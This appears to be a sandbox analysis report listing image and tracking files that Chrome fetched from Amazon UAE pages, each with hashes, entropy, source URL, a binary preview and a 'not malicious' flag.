                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................ZJD..$.I).JD.3.>...c.....`Q*oD/4...H......7.....'......%nom.iFX..f.NW......"..x....j....+..S..(.i..v.........dN.g6T.e=...w...q.].K>...6......=&.3h.[?S...Y. .GEG...4....n8!z,.I).-.[>|...%`.../.7..D-.....%...^I`aM@..$.8...=...Q..v.]F.........;x9.2....|4.....M!.~....z.t..E.V........+."C.B.j].. V.....U...."_.....OR..,.7{^S.v.A.e.KZ,l..W....{:....C...'.*...Cr}...o<.. Jk9...%.....Ae^.....mK..a..V.C....(..?.q..=*.....n..V'...~pYM2..98...T.v.0..z\p-.G>........g...q...z..e...`U...$9..0.+..<.%G.G."jU%.}...@Kn .....uql.h.xS.e..p....y]...}.y.m.>+[n..-K....wA..\..K....;..n......;<#-.kv..............$7..r.^..qSZ....K>q.......x.!fa.R.....[&...o......9...Q:r....._1.D.Z..z.j~...&.N..~Q[+.E...........hP.......|..6[....6..IG.....l.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x262, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):28737
                                                                                                                                                                                                                                                                      Entropy (8bit):7.98094725469577
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Jsin0rFh+3pVWgWid6plym6w7PUPp3ApEThPcEof:J5n0rzcWgWid6plz6GPUPZAkEEi
                                                                                                                                                                                                                                                                      MD5:A9CD6D74059D34A88096BA0B688528DB
                                                                                                                                                                                                                                                                      SHA1:2503BCD6E157299C30C14ED2394B594B6CD29D70
                                                                                                                                                                                                                                                                      SHA-256:A0EDEC95E9A0C0F0A99B45CD7409A4827E94E5F3E023D3F58826E450C625B9D3
                                                                                                                                                                                                                                                                      SHA-512:2359B2605C94FD170359FE36B494A3740A9260EE9B7C428B9CB7EEB4485A0571E1FDBE13A9EE5113FA3738B4A558B01A6CF05A6AB31A96E2629034FF481F1F2F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81cggBqOhgL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........6...................................................................$.$.$.$.$.$.$..(....4...-.`.4.8vs.D...$.$.$.$.$.$.$.*.s'..Fy.\..x.......`.A..s.T.Y|.x/K...u}.9.NY.{+qa.S..hz0B.Y_....;.".....$.O..h.:Jo2....o.Z.:..Y.j.H..z....3.BV...K.......E...'...G.2&:"._.;....}.z.7C.......C.@.r.i.........5>.H.b....;..[....=..Ll{m.7..........0.f...ZN..V$q.v..X4.~%..^}5..S..o\.W\.f..~5e....\....co....i.....!.XYN.-..t.g..k..)3,.Y.f..Bj8l|=..nU;}n:}..=...t.?I..,>..z.......th.......0.. ..53.;E.8.V..+.#...._~d.b....!39.6..L...(.WM.......9.b..,...X......_.=.`.x.<...Y..0k....=9o_.9pl*#.e..L.. ...mc....6y_>..........{5..s..G.%..f.4....)...#v..S.IsO=.h..+.UV.W"tKv..7.+<.M.Y.N......t.o;..d=..Z...h.....D.=..c...._....E%...fp;...M.L}...v.73.m.y.3.6._.-...=Q.L.....#.;.)s=.5....SM.fD.....{..{I.~.$..i.?.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24841
                                                                                                                                                                                                                                                                      Entropy (8bit):7.932665573143035
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:GNodyc13108b64gWmU0bV/VCym3R87F/KJSY7D6B9xfMQXD5/70M:GNodyc1l0dOmU0XgAF6x7mBzPXBl
                                                                                                                                                                                                                                                                      MD5:56C0AB3DF0885D1EF49FB252ABAAF1EB
                                                                                                                                                                                                                                                                      SHA1:58C72915493303803E53642E04524783C8DE6067
                                                                                                                                                                                                                                                                      SHA-256:FD446B8D8ED542AB5C39D7BE26BCA829D4689000829512183793CE798B754FAE
                                                                                                                                                                                                                                                                      SHA-512:69F36A68FA2F06EE604598A5B7A9E616B188B9A569DA261115C5C89D0BFE409A9ED80BB06C477DBB71D6C9A0C3AEC2BBCAE45A93163127A5D8A8023B47026112
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................5..................................................................R..........GGgWS6..\X..e.=.L.l.....{{[cg................Q1..q{x0e....g.RSRZ_FBGT..........<.XhI.().ml.......gg...t.................].%p`.........>|v..*bk@..........Z.+3...>V.;.4vp..5..K..f.+.u3.kf.J.........P..8...........8.........}.7[e......GM.b3g....T.....d..GU.+-...........y.P....H.E...O.k...{.Ob.J.n-|...........G.?.F.......nZ..H....U.........../}..M.Y'2..s...X............. ...._.+....yl...;k..c!...n.Jke..$.*..0.e46...........t1`...DC.UyI...?k....V.sY...M.o.].....e;...vHY.......-]\,.......j_..x......W..r...`...L...O..y.an............;n.ko....qS.Z[.....j..K.l.t..\.M..]..i......u...w.Y!$...........>...h....F.....hl....M[...ss....z.>........[?."........^."rv8.1..tx......%...K....u...=.......].7..9..kK.u.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x314, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23618
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967671292793069
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:oh4yHX0hI8ZLVrJPqXoClF0ojUpM0p86O+65le7sLBsPx5Ac:fmXQ9LBJ0oy0CW+66qiC
                                                                                                                                                                                                                                                                      MD5:5EBCB775D6E2C3354BA66C13A2C316AF
                                                                                                                                                                                                                                                                      SHA1:7F6E066EA807D2A1B2EA201D07EB6DFDABA05F82
                                                                                                                                                                                                                                                                      SHA-256:BC6B852261CACF956106096D0157290A7E6523AC86787EEEECF477ED33540763
                                                                                                                                                                                                                                                                      SHA-512:78357E30D3E44BC6F542E371961436124901CDEA98B292D692944165273F3FDF1D79ADE082305CE398752FE2CFFE1E7F6D89A0F2947446CEFC18D3358FEFDC52
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71xqZsKXk-L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......:.@.."..........5....................................................................M].....'HYP....2|.....S.6...>...|.\.k:..j..O.[0.@........}^.|.......Kh......8.<.}.h\..s.^(j..]`c7..B.~.U...j.V.~..........fK.f.TK..XY...F.)...].k.!......Pm4.O...{c].%.....2..~.......W...L.6c.!a.....|.5...M...I.T3..;...u..."WZ{.Y............-.C)diU.....R.~.v.SM...../J,^.F.....^...\.,.R.....(...B.fF..q...>..Cs...l.Kn..&..j..+G:........|.a...`.....h6.\.H...g]..u...=.R.NM..m.WV/...e.wq[...=NY3.W.>}..xy......jX.M.q3.+..j..U...R..0..bWb.v...D.-O6yS..-usX..K...:...caW.b-}.-.j2tr.,6).y`...DO..#~............@...j...]x.].oI............z...8.R.%.N..)Q.I...J....yN\....'8.5N.c%/v{[.L.Z..Q..c&.P~+.LF..1.T..d...:...!.cu3A...,.z.>k4o.....u.r...U)E...sy.cZ.t......! ...........%1.=..5X...*....[..C.,ko.....c....s..=.A.\..u.6.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 210x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4859
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8956435868024615
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:T8ja22Zpd3ekXwanv9YYDKaiZtJy3OjBt5YFpyLAELWCumnoRxA:QO2wdukXwanFY5HJ0O9YFoxiCJnoxA
                                                                                                                                                                                                                                                                      MD5:DD88EDA09796D56422826744B7D842B3
                                                                                                                                                                                                                                                                      SHA1:9C7F2E349AD1C99ED6BBDCC6EA7866C024724FA5
                                                                                                                                                                                                                                                                      SHA-256:B3A5D42D826B5A323BEF714311D4BB4055931A507C11FE8FDE2340DADBBB0EBD
                                                                                                                                                                                                                                                                      SHA-512:A48F8984F28D188F74E8065EA900D0916F22D3EA88CA4C2D8EFCBBB054F16A8D39A39435A9A35EF0934BAAF740CFE9F9FCA6FF3CBBF31DD56F799B3484B54C4E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1..46AQqr...."as.3.....2BCS......#$Rt...D.............................................1.!Q............?....0LJ..$.......0..q.qp.lE..j.....k.xe./..b.Wj...-...=4....>...6.....n...RU.!.....5-...Pb.B{..I.\.:......M{n+......\.....].9C.@...`......N../Q.3.m..Q"....N.#K...h...<..c.........y.......W...+...=y.D_.2d.....95.......l(q($y..../..D.Y.6A...{..f...........s.3....b..r..N...?.[IEaP.j.\.qR}h......'.2.[...a....3..^.=..3.._f.K.......^...Nq..Z...4. ....!..!..!..!..!..!..!........y.\(J...9...".X.P....:..g.u...t.@...p..f..$...N.<RF.I..'..@.\o.N..u..|F.}.........X..U.*.VX...e.... ....I.[....:......vz9..w\R:.{r.uA.N.`..+...=lT4~l.....r}..8_....~...$...b..j...7..........L...fk.`z.I....l......M ..aB...............<2.W..E.p...y...".X.T.A...I
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):36770
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9386722344509435
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:dnTBlQCuePS7BC60Q3OZmoi0WKcy9g8e6yMa1QJb9YgT04585t:dTBuaSVR03PqKcy9WU7bYa04585t
                                                                                                                                                                                                                                                                      MD5:E0899D63FC88645F6242171ACA070820
                                                                                                                                                                                                                                                                      SHA1:2BD5E3E2A40A47A035EE3ABC47E10EC6BD751144
                                                                                                                                                                                                                                                                      SHA-256:21F6D1B92D8B8A287250231D8E196A086AB354F513C6AEBA331D1C32090AB061
                                                                                                                                                                                                                                                                      SHA-512:A76BB92306A68898F42CAFDA6697CFD7F0F155D69AE575C7C165250DCCA944E1AB4379429659BE51F9E1E75C2C810BE22030986BB5625084B8B81CAF6A20E843
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-emiratesbiofert_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................F...........................!.1...A."Qa.2q.#B..$%....&R.3CSb46Dr......................................?.........................!1.."A.Qa.2q..#B.....$3....Rb.r.C...............?....c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1..c...1...j.P.n...a.h....>.@..o>.(.{.d......I.x..V.0..#.h....M....}..I.2.iAp...z.C.6h......YP7.`?....i.. ..G.....G).Q..D>ZivP. q... 8.iq...2....h.w....&.~.@S....P........}.^......._.]w...u..).......WG.......X.z.........H.p.{..........~<|O.H.?....n..q.DD|....=.]..w.l|....#....._.......?P..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9720
                                                                                                                                                                                                                                                                      Entropy (8bit):7.949351729172538
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:HJ3hX9oCmAccgDULcGznEMbV1YpSAluf0NkJ+al0weu4alQuJLIH9Z+:HfKCmAcrUYQnEMTiNkYal0we6lQuCHb+
                                                                                                                                                                                                                                                                      MD5:06962B89C87DF1D03BFF1AB1D2DD8CA5
                                                                                                                                                                                                                                                                      SHA1:45CDF6CF13EF2041107CF96319167F28F5936E38
                                                                                                                                                                                                                                                                      SHA-256:32A555B4B3BDC0CE46DB572BC8A0740198FC999D342464837A53DBC553E70AA3
                                                                                                                                                                                                                                                                      SHA-512:43603EE532CF2FF5929AF6D91319898427FED5C4C52F74097AB4BEF048C24C0150DF225E5D680FD2D4CF9242894E21A88C87421AB6AA6615A124D426BC88C311
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61za6jnk1GL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.".A.#2BQaq.R...3C...$6bc...%Tru.................................................!1..A.q..."#2Qa....CR...............?..t...^.....h."C..V/v.#%...]..;..V..I.O.cZ.i.Vr?...B1m...B@....-.su{ .;.....E.}C.c..s..R@...i..2..............w...J.kW7...<}!....J....uu....,....ZS..sY....S..:T.WB.....E!K...I...EO...+.z..q../d..h1.l...X$..U....>..%....$Q..UZ.....tx....or.Y.#.......S-...Q....{X..kh..F@.P...<..0.....*6c-z.."...I.....................'.%p.K......+.j.i....E...2........F*....l.....l.F.Q..l.T..!..r..R...>.o.j..A.I.....w.cue\z...+.Q.....r....5..e....[.....G.8.r... oq.S...(... .0k.f{..t..gf.{..Q}#.....NVa...m ../......,..`..'....>.....L^s.j$......a.#.].c..[w.L...F.r............'N.}.Jo..*.T..bE..)T$R....(.)J.JR.R..(.\..X....1#.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3DjQueryDomReady%26cf0%3D51717%26pc0%3D51717%26ld0%3D51717%26t0%3D1724264970911%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:51716
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x250, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):39516
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972024116551709
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:xiqBv1n0WFDVzIk6a6XG8kPaq6Oxqp7YNLFFjCA9gfpn11KusA5q423q1:Dtn0YVzIla6W8Q64q9Y3FX9cp1ls+qxK
                                                                                                                                                                                                                                                                      MD5:C67B003EAD831C68E0FF99D36099E1A3
                                                                                                                                                                                                                                                                      SHA1:1513958AC2F0A22C952F6DE05178A1F3FBCE056C
                                                                                                                                                                                                                                                                      SHA-256:D5A9CB812FE2A02197421420D1802E038CAF7EF079E262D003EC1F23E73D0E75
                                                                                                                                                                                                                                                                      SHA-512:CF06A5C33B72F16CA1157A4CDB9B95C22C2174ED67D6BA10DAA25228F578A5D48338E80AB9F6C3464E59BA62FD6834BA196830D1F6BAE14F595484213F99A42E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C....................................................................C.........................................................................,..............................................T..............................!.1."AQ.2a.#Bq.$R..b....%349Sr...67CTcsuvw.............................................I..........................!1A.."Qaq..2....BR....#b...4r.....$Sc.5s%3...............?..~...%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.*..p.L.FV......_.;%H#.gZ.x...-...S.....e.P....1. P..5.....6.T.R.y..../...m=....W.};.+..U......QX.d.+g.t......... ^&.....i.sJ.C. y.........m.%.'.|...X..OMm=..P.V......t..W....=.&R..Fq.......Y....fL...w...W.?...7.4....w.V.S...X..y.7.#....Ts.v.:wY......g..4Ceh...W.,.le.#*H.C..-R&.JpQ.A.R0..P1H.pz...P-o..s.{.p.1;.J....q{.o.Y......OL<Mn..C.2..N@..$,+.=..[..l.v.<Y.D}.f.~@M4LE...16.R.X~-..<.;i.q......0.8.d........^............i...`.......U.\[.X..P2.A.U..=.`.....c.z.Qc..........7....}..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26ctb%3D1%26sc0%3DsafeFrame%3A8e0c4c15feaa708dde4b89323fa4b7f30304fda8%3Aadplacements%3Asearch%3Aauto-left-advertising-1%3Asearch-desktop-loom%26bb0%3D3067%26af0%3D3068%26cf0%3D6355%26pc0%3D11001%26ld0%3D11001%26t0%3D1724264942187%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:11001
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):922
                                                                                                                                                                                                                                                                      Entropy (8bit):5.338067409756557
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:tVgL6OR0UH8Z0o4PSnR0UH8Z0o4uPuTwplnJHxlLS2xke:gdSUcSSnSUcXplnJHfS2xke
                                                                                                                                                                                                                                                                      MD5:4A5F104A2A50E2E8F74627CF3F23B925
                                                                                                                                                                                                                                                                      SHA1:5CC46A309FBEEC0517B2DB862606ED47D19CB8A5
                                                                                                                                                                                                                                                                      SHA-256:CA7025BF17C133F37655A1E2AC3DE72AB0EAF2B430E3C4E655A00345D494BD6D
                                                                                                                                                                                                                                                                      SHA-512:F233C91D012C76D16047AF690CA443A0FC133B797EBF1DF0FE5C3BC38CB0530AEDB7F903664C33E2728D4DD7D68F0A4ED074B4115D7AEE8E228F1F0D3F61CCC3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<svg version="1.1" xmlns="http://www.w3.org/2000/svg" focusable="false" aria-hidden="true" viewBox="0 0 19 19" shape-rendering="geometricPrecision"><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:url(#_starGradient_7ojuhn2cj)"></path><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:none;stroke:rgb(162,106,0);stroke-width:1"></path><defs><linearGradient id="_starGradient_7ojuhn2cj" x1="0" y1="0" x2="1" y2="0" gradientUnits="userSpaceOnUse" gradientTransform="matrix(7.07124e-16,11.5482,-11.5482,7.07124e-16,9.4995,5.53952)"><stop offset="0" style="stop-color:rgb(255,206,0);stop-opacity:1"></stop><stop offset="1" style="stop-color:rgb(255,167,0);stop-opacity:1"></stop></linearGradient></defs></svg>
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):36028
                                                                                                                                                                                                                                                                      Entropy (8bit):7.951911755608319
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vep4FYU9A+TcvO7PAfIZJ6hGTwxHqAgxcfxFO5I5DWMt/SrsBS:p6UZTc2xZ4hGTw9XgAEI5WMK
                                                                                                                                                                                                                                                                      MD5:A675FB18FFC42F65896861C5F8BD9801
                                                                                                                                                                                                                                                                      SHA1:77259E411F272394B208B9E751A179CE8874D6A2
                                                                                                                                                                                                                                                                      SHA-256:646567B92841C5D03ABAFBF1B9AF29CB5A55A1C51D5B959FEFAE2AEB2D4903F2
                                                                                                                                                                                                                                                                      SHA-512:1DC525FF9EA7C0261C0005C00C474A0CA4BE16544D995F90AF298F598384C1CC4A99B06209E1A31CE9063806BE9FE82033F2E7C38BE2197B2E52A705ADF7929D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!.."1AQa...#2Bq..RV....br..$38CSstu.............%'67Tv.........&Wc..49DFUd.............................!1"AQq.......2RSa......Bbr..#3....4$5Cs...%............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>....P.n../...d..l...I.....I..{.-...FMr..V]f}...W.}K...;.W.....)..}...a...;.......3..f..ww..Z...e.8...Xyn..lY0ZB8.......8.M......?.k....=*z ..N....C...n..v.K4..-...d.#..../..*.........-.O....k.9.~k/mo.....|...s..;..<..h..a..o....[.....F..,1....U...B....O..-....r."G..i..*......K.}.?.^.....`..v....8.nA.....Il......z...n..4...h...5.e......<6..1.c...?.~...y....e.T.....&4.N..e%..^.~...*..#4#.Kgz...G$Q...x...._.........K.T._...;a.W2U/oop.7M......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3481%26pc%3D12400%26at%3D12400%26t%3D1724264979240%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:12399
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 640x360, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):36717
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9642146220804095
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:PiF7TNlLVcpzaMkgB8/m+Hgdvxkb0Xas8qboi7/ZRBlmimKBLh0x:PSTNtVA9kgB8/VgDTXtZsiTBMiDyx
                                                                                                                                                                                                                                                                      MD5:7A66912E9842139E54A2C42DC16599FB
                                                                                                                                                                                                                                                                      SHA1:0ACBB180B49D8F67E8D5F453569D90E8ACE43EA2
                                                                                                                                                                                                                                                                      SHA-256:E82D4405C03A83A66B50121DEDCE474A6EDCC0727D7C207AA807E228C81B279F
                                                                                                                                                                                                                                                                      SHA-512:83755D93337C510D1AAAF919A0D7D75ADA5FDFB7A57D084F66914F8A08B9875B1D04A210780CE6C1686B7A5EDD7D0C1BDE0394B5A8E8258FDD2904340569811C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0..........................................%...#... ,!#&')*)..-1-(0%))(...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......h...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(p.>..^.r#...{.u...R9..9..^k}.HK.1....z0..:}o\....\.!#w.y..4...W.M#..Y.'..E..2.G........y9.s.).X.L.6......`.....+;..T'.S.]...*...y.|.?.O.VQ......*.......R.7.R2.M..t.{[...2.T-n..Fj...8..g;5cH.u.2L.{..A{uj.g....W)...........3\...w=/K.c.X..L.y....+.t..0I..r.Xr.......J...hZ.|.......R.+..4
